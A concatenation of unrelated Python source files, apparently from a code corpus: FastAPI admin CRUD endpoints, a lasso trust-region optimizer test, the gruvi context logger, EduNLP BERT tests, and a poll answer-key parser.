async def read_users(current_user: AdminUser = Depends(get_current_active_user),
skip: int = 0, limit: int = 100, db: Session = Depends(get_db)):
return await crud.get_users(db, skip=skip, limit=limit)
@app.get("/users/{user_id}", response_model=schemas.AdminUser)
async def read_user(user_id: int, db: Session = Depends(get_db),
current_user: AdminUser = Depends(get_current_active_user)):
db_user = await crud.get_user_by_id(db, id=user_id)
if db_user is None:
raise HTTPException(status_code=404, detail="User not found")
return db_user
@app.post("/data/upload/")
async def upload_data(db: Session = Depends(get_db),
current_user: AdminUser = Depends(
get_current_active_user)):
return await crud.upload_data(db=db)
@app.get("/data/all", response_model=List[schemas.Data])
async def get_all_data(page: int, entries_per_page: int,
current_user: AdminUser = Depends(
get_current_active_user), db: Session = Depends(get_db)):
return await crud.paginate_data(page, entries_per_page, db)
@app.get("/data/filter_by")
async def filter_data(
filter_parameter: str,
save_as_csv: bool = False,
city_name: Optional[str] = None,
range_start: Optional[str] = None,
range_end: Optional[str] = None,
db: Session = Depends(get_db),
current_user: AdminUser = Depends(
get_current_active_user)):
return await crud.filter_by_parameters(filter_parameter, city_name, range_start, range_end, db, save_as_csv)
@app.post("/data/update/{transaction_id}")
async def update_data(transaction_id: UUID,
data: schemas.DataUpdate,
db: Session = Depends(get_db),
current_user: AdminUser = Depends(
get_current_active_user)):
db_data = await crud.get_data_by_id(db, transaction_id=transaction_id)
if not db_data:
raise HTTPException(status_code=400, detail="Data not found!")
else:
return await crud.update_data(db=db, data=data, transaction_id=transaction_id)
@app.post("/data/delete/")
async def delete_data(transaction_id: UUID,
db: Session = Depends(get_db),
current_user: AdminUser = Depends(
get_current_active_user)
):
db_data = await crud.get_data_by_id(db, transaction_id=transaction_id)
if not db_data:
raise HTTPException(status_code=400, detail="Data not found")
else:
return await crud.delete_data(db=db, transaction_id=transaction_id)
if __name__ == "__main__":
processing.init_admin_user(db=SessionLocal()) # create default admin user
    uvicorn.run("main:app", host="0.0.0.0", port=5000, reload=True) | main.py | 0.764056 | 0.092442 |
from typing import cast
import numpy
import scipy.stats # type: ignore
from optimizer import trust_region
from overloads import difference
from overloads.typedefs import ndarray
class Sample:
beta: ndarray
X: ndarray
Y: ndarray
lambda_: float
beta_decomp: ndarray
def symm_eig(self, A: ndarray) -> ndarray:
A = (A.T + A) / 2
return cast(ndarray, numpy.linalg.eigh(A)[0])
def orthogonal_X(self, X: ndarray) -> ndarray:
for i in range(1, X.shape[1]):
norm = numpy.sqrt(X[:, i] @ X[:, i])
X[:, i] -= X[:, :i] @ numpy.linalg.lstsq(X[:, :i], X[:, i], rcond=None)[0]
X[:, i] *= norm / numpy.sqrt(X[:, i] @ X[:, i])
return X
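    # Soft-thresholding operator S(b, t) = sign(b) * max(|b| - t, 0): the
    # proximal map of the L1 penalty, used for the closed-form lasso
    # comparison value below.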
def soft_threshold(self, beta: ndarray, lambda_: ndarray) -> ndarray:
beta = numpy.sign(beta) * numpy.maximum(numpy.abs(beta) - lambda_, 0.0)
return beta
def lasso_decomp(self) -> ndarray:
m, n = self.X.shape
beta_decomp: ndarray = numpy.linalg.lstsq(self.X, self.Y, rcond=None)[0]
beta_decomp = self.soft_threshold(
beta_decomp,
(m / 2.0 * self.lambda_)
* numpy.linalg.lstsq(self.X.T @ self.X, numpy.ones((n,)), rcond=None)[0],
)
return beta_decomp
def __init__(self, m: int, n: int) -> None:
self.beta = self.symm_eig(numpy.random.rand(n, n).T)
self.X = self.orthogonal_X(scipy.stats.norm.ppf(numpy.random.rand(n, m).T))
self.Y = self.X @ self.beta + scipy.stats.norm.ppf(numpy.random.rand(m))
self.lambda_ = 2 * numpy.quantile(
numpy.abs(numpy.linalg.lstsq(self.X, self.Y, rcond=None)[0]), 0.3
)
self.beta_decomp = self.lasso_decomp()
numpy.random.seed(5489)
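# Lasso objective: ||Y - X @ beta||^2 / m + lambda_ * ||beta||_1.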
def lasso_objective(beta: ndarray, X: ndarray, Y: ndarray, lambda_: float) -> float:
err = Y - X @ beta
obj = err @ err / err.shape[0]
obj += lambda_ * numpy.sum(numpy.abs(beta))
return float(obj)
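# Subgradient of the objective: the L1 term contributes +/-lambda_ on nonzero
# coordinates and, by the convention used here, 0 where beta == 0.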
def lasso_gradient(beta: ndarray, X: ndarray, Y: ndarray, lambda_: float) -> ndarray:
err = Y - X @ beta
grad = cast(ndarray, -(2 * err) @ X / err.shape[0])
grad[beta < 0] += -lambda_
grad[beta > 0] += lambda_
return grad
def once(m: int, n: int) -> None:
sample = Sample(m, n)
constraints = (
numpy.empty((0, n)),
numpy.empty((0,)),
numpy.full((n,), -numpy.inf),
numpy.full((n,), numpy.inf),
)
opts = trust_region.Trust_Region_Options(max_iter=500)
opts.check_rel = 1
opts.check_abs = 1e-5
result = trust_region.trust_region(
lambda beta: lasso_objective(beta, sample.X, sample.Y, sample.lambda_),
lambda beta: lasso_gradient(beta, sample.X, sample.Y, sample.lambda_),
numpy.zeros((n,)),
constraints,
opts,
)
abserr = difference.absolute(result.x, sample.beta_decomp)
relerr = abserr / numpy.mean(numpy.abs(sample.beta_decomp))
print(f"result.success: {result.success}")
print(f"relerr : {relerr}")
print(f"abserr : {abserr}")
print(
"result.x : \n",
numpy.concatenate(
(
sample.beta_decomp.reshape((-1, 1)),
result.x.reshape((-1, 1)),
),
axis=1,
),
)
assert relerr < 0.35
assert abserr < 0.35
class Test:
def test1(self) -> None:
once(m=1000, n=4)
def test2(self) -> None:
once(m=1000, n=8)
def test3(self) -> None:
once(m=1000, n=16)
def test4(self) -> None:
once(m=1000, n=32)
if __name__ == "__main__":
Test().test1()
Test().test2()
Test().test3()
    Test().test4() | tests/test_lasso.py | 0.861115 | 0.678899 |
from __future__ import absolute_import, print_function
import os
import sys
import logging
import threading
import fibers
import six
from . import util
__all__ = ['get_logger']
# Add a new level: TRACE.
logging.TRACE = 5
assert logging.NOTSET < logging.TRACE < logging.DEBUG
logging.addLevelName('TRACE', logging.TRACE)
_logger_name = 'gruvi'
_logger_dict = {}
# The logging module documents this slight hack to disable finding caller
# information (via sys._getframe()) for every logging call. In our logger we
# only get logging information if needed (at the DEBUG level or higher), so we
# can disable collecting it for every call.
logging._srcfile = None
def get_logger(context=None, name=None):
"""Return a logger for *context*.
Return a :class:`ContextLogger` instance. The instance implements the
standard library's :class:`logging.Logger` interface.
"""
# Many class instances have their own logger. Share them to save memory if
# possible, i.e. when *context* is not set.
if name is None:
name = _logger_name
if context is None and name in _logger_dict:
return _logger_dict[name]
if context is not None and not isinstance(context, six.string_types):
context = util.objref(context)
logger = logging.getLogger(name)
logger = ContextLogger(logger, context)
if context is None:
_logger_dict[name] = logger
return logger
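# A hedged usage sketch (not part of the original module); 'conn-1' and `addr`
# are illustrative:
#
#   log = get_logger(context='conn-1')
#   log.debug('connection from {}', addr)   # '{}'-style args, see ContextLogger.log()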
class ContextLogger(object):
"""A logger adapter that prepends a context string to log messages.
It also supports passing arguments via '{}' format operations.
"""
__slots__ = ('_logger', '_context')
# This is not based on logging.LoggingAdapter because the 2.x and 3.x
# implementations differ quite a bit, which means we would need to
# reimplement almost the entire thing anyway.
def __init__(self, logger, context=None):
self._logger = logger
self._context = context or ''
@property
def context(self):
"""Return the logging context."""
return self._context
def thread_info(self):
"""Return a string identifying the current thread and fiber."""
tid = threading.current_thread().name
if tid == 'MainThread':
tid = 'Main'
current = fibers.current()
fid = getattr(current, 'name') if current.parent else 'Root'
return '{}/{}'.format(tid, fid)
def frame_info(self):
"""Return a string identifying the current frame."""
if not self._logger.isEnabledFor(logging.DEBUG):
return ''
f = sys._getframe(3)
fname = os.path.split(f.f_code.co_filename)[1]
return '{}:{}'.format(fname, f.f_lineno)
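    # Build a "[thread/fiber|context|file:line]" prefix, interpolate *args with
    # str.format(), and delegate to the wrapped logger's _log().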
def log(self, level, msg, *args, **kwargs):
if not self._logger.isEnabledFor(level):
return
prefix = '{}|{}|{}'.format(self.thread_info(), self.context or '-', self.frame_info())
if args:
msg = msg.format(*args)
msg = '[{}] {}'.format(prefix, msg)
self._logger._log(level, msg, (), **kwargs)
def trace(self, msg, *args, **kwargs):
self.log(logging.TRACE, msg, *args, **kwargs)
def debug(self, msg, *args, **kwargs):
self.log(logging.DEBUG, msg, *args, **kwargs)
def info(self, msg, *args, **kwargs):
self.log(logging.INFO, msg, *args, **kwargs)
def warning(self, msg, *args, **kwargs):
self.log(logging.WARNING, msg, *args, **kwargs)
def error(self, msg, *args, **kwargs):
self.log(logging.ERROR, msg, *args, **kwargs)
def critical(self, msg, *args, **kwargs):
self.log(logging.CRITICAL, msg, *args, **kwargs)
def exception(self, msg, *args, **kwargs):
kwargs['exc_info'] = True
        self.log(logging.ERROR, msg, *args, **kwargs) | lib/gruvi/logging.py | 0.645455 | 0.11808 |
import torch
import numpy as np
import pytest
from EduNLP.Pretrain import BertTokenizer, finetune_bert
from EduNLP.Vector import BertModel, T2V
from EduNLP.I2V import Bert, get_pretrained_i2v
@pytest.fixture(scope="module")
def stem_data_bert(data):
test_items = [
{'stem': '有公式$\\FormFigureID{wrong1?}$和公式$\\FormFigureBase64{wrong2?}$,\
如图$\\FigureID{088f15ea-8b7c-11eb-897e-b46bfc50aa29}$,若$x,y$满足约束条件$\\SIFSep$,则$z=x+7 y$的最大值为$\\SIFBlank$'},
{'stem': '如图$\\FigureID{088f15ea-8b7c-11eb-897e-b46bfc50aa29}$, \
若$x,y$满足约束条件$\\SIFSep$,则$z=x+7 y$的最大值为$\\SIFBlank$'}
]
data = test_items + data
_data = []
tokenizer = BertTokenizer()
for e in data[:10]:
d = tokenizer(e["stem"])
if d is not None:
_data.append(d)
assert _data
return _data
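# The fixture prepends two SIF-formatted items (containing figure and formula
# tokens) to the shared `data` fixture and keeps whichever of the first ten
# items tokenize to a non-None result.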
def test_bert_without_param(stem_data_bert, tmpdir):
output_dir = str(tmpdir.mkdir('finetuneBert'))
finetune_bert(
stem_data_bert,
output_dir
)
tokenizer = BertTokenizer(output_dir)
model = BertModel(output_dir)
item = {'stem': '如图$\\FigureID{088f15ea-8b7c-11eb-897e-b46bfc50aa29}$, \
若$x,y$满足约束条件$\\SIFSep$,则$z=x+7 y$的最大值为$\\SIFBlank$'}
inputs = tokenizer(item['stem'], return_tensors='pt')
output = model(inputs)
assert model.vector_size > 0
assert output.shape[-1] == model.vector_size
t2v = T2V('bert', output_dir)
assert t2v(inputs).shape[-1] == t2v.vector_size
assert t2v.infer_vector(inputs).shape[-1] == t2v.vector_size
assert t2v.infer_tokens(inputs).shape[-1] == t2v.vector_size
def test_bert_i2v(stem_data_bert, tmpdir):
output_dir = str(tmpdir.mkdir('finetuneBert'))
train_params = {
'epochs': 1,
'save_steps': 100,
'batch_size': 8,
'logging_steps': 3
}
finetune_bert(
stem_data_bert,
output_dir,
train_params=train_params
)
item = {'stem': '如图$\\FigureID{088f15ea-8b7c-11eb-897e-b46bfc50aa29}$, \
若$x,y$满足约束条件$\\SIFSep$,则$z=x+7 y$的最大值为$\\SIFBlank$'}
tokenizer_kwargs = {"pretrain_model": output_dir}
i2v = Bert('bert', 'bert', output_dir, tokenizer_kwargs=tokenizer_kwargs)
i_vec, t_vec = i2v([item['stem'], item['stem']])
assert len(i_vec[0]) == i2v.vector_size
assert len(t_vec[0][0]) == i2v.vector_size
i_vec = i2v.infer_item_vector([item['stem'], item['stem']])
assert len(i_vec[0]) == i2v.vector_size
t_vec = i2v.infer_token_vector([item['stem'], item['stem']])
    assert len(t_vec[0][0]) == i2v.vector_size | tests/test_vec/test_bert.py | 0.495117 | 0.459622 |
import pandas as pd
import Poll
import re
class Answer ():
def __init__(self, questionText, answer):
self.questionText = questionText
self.answer = answer
def getNumbers(self, str):
array = re.findall(r'[0-9]+', str)
return array
def read_and_assign_answerkey(self, answerkeyPolls,name,QuestionTypes,AllAnswerTextIncludes,AllPollTextIncludes,AnswerKeyCont):
whichRow = 0
numOfAllPolls = 0
inWhichPoll = -1
PollsA = []
pollname = ""
pollNumber = 0
polllength = 0
inWhichQuestion = -1
pollquestions = ""
pollanswers = []
pollanswersForEachQuestion = []
inputAnswer=Answer("","")
try:
file = open(name+AnswerKeyCont, "r", encoding="utf-8")
            for i in file:  # Iterate over every line of the file, just as with a list.
if i != "\n":
                    if whichRow == 0:
                        # The first line of the file carries the total poll count.
                        parts = inputAnswer.getNumbers(i)
                        numOfAllPolls = parts[0]
                    elif AllPollTextIncludes[0] in i and AllPollTextIncludes[1] in i:
                        inWhichPoll += 1
                        if inWhichQuestion != -1 and inWhichPoll != 0:
                            answer = Answer(pollquestions, pollanswersForEachQuestion)
                            pollanswers.append(answer)
                            pollquestions = ""
                            pollanswersForEachQuestion = []
                        if inWhichPoll != 0:
                            poll = Poll.Poll(polllength, pollanswers, pollname, pollNumber)
                            PollsA.append(poll)
                            pollanswers = []
                            polllength = 0
                            pollname = ""
                            inWhichQuestion = -1
                        # Poll header line: "<... poll number>: <name>\t<length> ..."
                        parts = i.split(":")
                        pollNumber = parts[0].split()[-1]
                        parts = parts[1].split("\t")
                        pollname = parts[0]
                        polllength = parts[1].split()[0]
                    elif (QuestionTypes[0] in i) or (QuestionTypes[1] in i):
                        inWhichQuestion += 1
                        if inWhichQuestion != 0:
                            answer = Answer(pollquestions, pollanswersForEachQuestion)
                            pollanswers.append(answer)
                            pollquestions = ""
                            pollanswersForEachQuestion = []
                        # Question line: keep the text before the question-type marker.
                        parts = i.split(". ", 1)
                        if QuestionTypes[0] in parts[1]:
                            parts = parts[1].split(QuestionTypes[0])
                        elif QuestionTypes[1] in parts[1]:
                            parts = parts[1].split(QuestionTypes[1])
                        pollquestions = parts[0]
                    elif AllAnswerTextIncludes[0] in i and AllAnswerTextIncludes[1] in i:
                        # Answer line: keep the text after the second space.
                        parts = i.split(" ", 2)
                        pollanswersForEachQuestion.append(parts[2].split("\n")[0])
                    else:
                        # Numeric line: parsed but not otherwise used here.
                        inputAnswer.getNumbers(i)
whichRow += 1
file.close()
except FileNotFoundError:
print("File is not found....")
if (inWhichQuestion != -1) and inWhichPoll != 0:
answer = Answer(pollquestions, pollanswersForEachQuestion)
pollanswers.append(answer)
pollquestions = ""
pollanswersForEachQuestion = []
if inWhichPoll != 0:
poll = Poll.Poll(polllength, pollanswers, pollname, pollNumber)
PollsA.append(poll)
answerkeyPolls=PollsA
return answerkeyPolls
# READ QUESTIONS AND ANSWERS OF THE QUESTION POLL
def isInsideInAnswerkeyPolls(self, answerkeyPolls, first_question_text):
        # One re.sub pass is enough to drop whitespace and punctuation before
        # comparing, so formatting differences do not hide a match.
        first_question_text = re.sub("[^0-9a-zA-Z]+", "", first_question_text)
        match_index = -1
        k = 0
        while k < len(answerkeyPolls):
            d = 0
            while d < len(answerkeyPolls[k].answers):
                question = re.sub("[^0-9a-zA-Z]+", "",
                                  answerkeyPolls[k].answers[d].questionText)
                if question == first_question_text:
                    match_index = k
                    break
                d += 1
            if match_index != -1:
                break
            k += 1
        return match_index
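    # The same normalization appears again in assignPoll below; a small helper
    # (illustrative only, not in the original file) would capture it:
    #
    #   @staticmethod
    #   def _normalize(text):
    #       return re.sub("[^0-9a-zA-Z]+", "", text)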
def assignPoll(self, Polls, answerkeyPolls, column, IndexOfanswerkeyPolls,dateofpoll,students):
w = 0
answers = []
pollName = answerkeyPolls[IndexOfanswerkeyPolls].pollName
answerLength = int(answerkeyPolls[IndexOfanswerkeyPolls].answerLength)
pollNumber = int(answerkeyPolls[IndexOfanswerkeyPolls].pollNumber)
        while w < answerLength:
            # Question cells sit at every other column starting at index 4.
            questionsInPoll = re.sub("[^0-9a-zA-Z]+", "", column[4 + w * 2])
            g = 0
            while g < len(answerkeyPolls[IndexOfanswerkeyPolls].answers):
                answerkeyquestionText = re.sub(
                    "[^0-9a-zA-Z]+", "",
                    answerkeyPolls[IndexOfanswerkeyPolls].answers[g].questionText)
                if questionsInPoll == answerkeyquestionText:
                    answer = Answer(answerkeyPolls[IndexOfanswerkeyPolls].answers[g].questionText,
                                    answerkeyPolls[IndexOfanswerkeyPolls].answers[g].answer)
                    answers.append(answer)
                g += 1
            w += 1
poll = Poll.Poll(answerLength, answers, pollName, pollNumber)
dateofpoll.append(" ")
        for student in students:
            student.answerof.append([])
Polls.append(poll)
        return Polls | Answer.py | 0.048597 | 0.11928 |